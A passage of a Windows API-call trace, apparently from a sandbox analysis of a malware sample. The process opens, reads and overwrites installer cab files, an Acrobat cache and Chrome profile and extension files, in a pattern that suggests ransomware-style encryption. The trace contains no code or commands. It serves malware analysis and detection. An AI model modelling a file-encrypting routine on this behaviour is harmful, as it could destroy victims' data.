lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.444] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.447] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.448] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.449] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4e8418 [0158.449] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.450] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4e8418 [0158.451] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0158.451] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0158.451] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.452] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.452] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0158.452] CloseHandle (hObject=0x1dc) returned 1 [0158.453] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.880] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.880] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x59bde5 [0158.880] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.880] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.880] ReleaseMutex (hMutex=0x168) returned 1 [0158.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.881] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.884] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.886] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.887] SetFilePointer (in: hFile=0x210, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x599de5 [0158.887] ReadFile (in: hFile=0x210, lpBuffer=0x286da88, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.889] SetFilePointer (in: hFile=0x210, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x599de5 [0158.890] WriteFile (in: hFile=0x210, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0158.891] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0158.891] WriteFile (in: hFile=0x210, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.892] WriteFile (in: hFile=0x210, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.892] WriteFile (in: hFile=0x210, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0158.892] CloseHandle (hObject=0x210) returned 1 [0158.892] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.894] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.894] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4b4520 [0158.894] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.894] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.894] ReleaseMutex (hMutex=0x168) returned 1 [0158.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.894] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.897] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.898] ReadFile (in: hFile=0x210, lpBuffer=0x27ec5a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x27ec5a8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.899] SetFilePointer (in: hFile=0x210, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4b2520 [0158.899] ReadFile (in: hFile=0x210, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.901] SetFilePointer (in: hFile=0x210, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4b2520 [0158.901] WriteFile (in: hFile=0x210, lpBuffer=0x28956a8*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0158.902] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0158.902] WriteFile (in: hFile=0x210, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.902] WriteFile (in: hFile=0x210, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.902] WriteFile (in: hFile=0x210, lpBuffer=0x28de2a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0158.903] CloseHandle (hObject=0x210) returned 1 [0158.903] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.904] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.904] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x12ea5 [0158.904] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.904] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.904] ReleaseMutex (hMutex=0x168) returned 1 [0158.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserCache.bin", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UserCache.bin", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UserCache.bin", lpUsedDefaultChar=0x0) returned 13 [0158.904] ReadFile (in: hFile=0x210, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0158.906] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11ea5 [0158.907] ReadFile (in: hFile=0x210, lpBuffer=0x289d708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x289d708*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.907] SetFilePointer (in: hFile=0x210, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x11ea5 [0158.908] WriteFile (in: hFile=0x210, lpBuffer=0x2848438*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2848438*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.909] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0158.909] WriteFile (in: hFile=0x210, lpBuffer=0x28996d8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x28996d8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0158.909] CloseHandle (hObject=0x210) returned 1 [0158.910] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.910] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.910] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xee0 [0158.911] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.911] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.911] ReleaseMutex (hMutex=0x168) returned 1 [0158.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap_unsigned.cdf-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0158.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap_unsigned.cdf-ms", cchWideChar=35, lpMultiByteStr=0x1fa55f4, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clickonce_bootstrap_unsigned.cdf-ms", lpUsedDefaultChar=0x0) returned 35 [0158.911] ReadFile (in: hFile=0x210, lpBuffer=0x2878148, nNumberOfBytesToRead=0xee0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2878148*, lpNumberOfBytesRead=0x359f2bc*=0xee0, lpOverlapped=0x0) returned 1 [0158.913] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.913] WriteFile (in: hFile=0x210, lpBuffer=0x289d838*, nNumberOfBytesToWrite=0x1468, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x289d838*, lpNumberOfBytesWritten=0x359f2d0*=0x1468, lpOverlapped=0x0) returned 1 [0158.914] CloseHandle (hObject=0x210) returned 1 [0158.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\crashpad\\settings.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.917] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.917] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x28 [0158.918] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.918] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.918] ReleaseMutex (hMutex=0x168) returned 1 [0158.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="settings.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="settings.dat", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="settings.dat", lpUsedDefaultChar=0x0) returned 12 [0158.918] ReadFile (in: hFile=0x210, lpBuffer=0x1fa55f0, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa55f0*, lpNumberOfBytesRead=0x359f2bc*=0x28, lpOverlapped=0x0) returned 1 [0158.920] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.920] WriteFile (in: hFile=0x210, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5b0, lpOverlapped=0x0) returned 1 [0158.920] CloseHandle (hObject=0x210) returned 1 [0158.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.921] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.921] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x126 [0158.921] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.921] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.922] ReleaseMutex (hMutex=0x168) returned 1 [0158.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Current Tabs", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Current Tabs", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Current Tabs", lpUsedDefaultChar=0x0) returned 12 [0158.922] ReadFile (in: hFile=0x210, lpBuffer=0x1f1c6a8, nNumberOfBytesToRead=0x126, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f1c6a8*, lpNumberOfBytesRead=0x359f2bc*=0x126, lpOverlapped=0x0) returned 1 [0158.923] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.923] WriteFile (in: hFile=0x210, lpBuffer=0x28956c8*, nNumberOfBytesToWrite=0x6ae, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28956c8*, lpNumberOfBytesWritten=0x359f2d0*=0x6ae, lpOverlapped=0x0) returned 1 [0158.923] CloseHandle (hObject=0x210) returned 1 [0158.923] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.924] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.924] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9a [0158.925] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.925] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.925] ReleaseMutex (hMutex=0x168) returned 1 [0158.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0158.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOG", cchWideChar=3, lpMultiByteStr=0x1f7ad5c, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOG", lpUsedDefaultChar=0x0) returned 3 [0158.925] ReadFile (in: hFile=0x210, lpBuffer=0x26b65b8, nNumberOfBytesToRead=0x9a, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b65b8*, lpNumberOfBytesRead=0x359f2bc*=0x9a, lpOverlapped=0x0) returned 1 [0158.926] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.926] WriteFile (in: hFile=0x210, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x622, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x622, lpOverlapped=0x0) returned 1 [0158.926] CloseHandle (hObject=0x210) returned 1 [0158.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0158.927] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.927] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: 